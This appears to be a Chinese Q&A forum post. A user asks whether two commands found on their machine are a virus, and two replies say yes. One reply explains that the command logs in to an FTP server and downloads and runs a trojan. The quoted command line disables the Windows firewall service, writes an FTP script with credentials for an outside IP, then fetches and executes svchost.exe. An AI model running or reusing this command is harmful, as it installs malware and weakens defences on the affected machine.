这两串代码是什么意思?病毒?

cmd.exe /c dir c:尀>c:尀T3tmp.log和下面cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 218.27.135.87> cmd.txt&echo 498905461>> cmd.txt&echo 498905461>> cmd.txt&echo binary >> cmd.txt&echo get svchost.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&svchost.exe&svchost.exe&del cmd.txt /q /f&exit"
2026年09月26日 14:17
有2个网友回答
网友(1):

确实可能是病毒

网友(2):

这个就是建立一个下载的任务,从 218.27.135.87登录 ,帐号密码都是:498905461然后下载svchost.exe(应该是木马文件)文件到本地执行。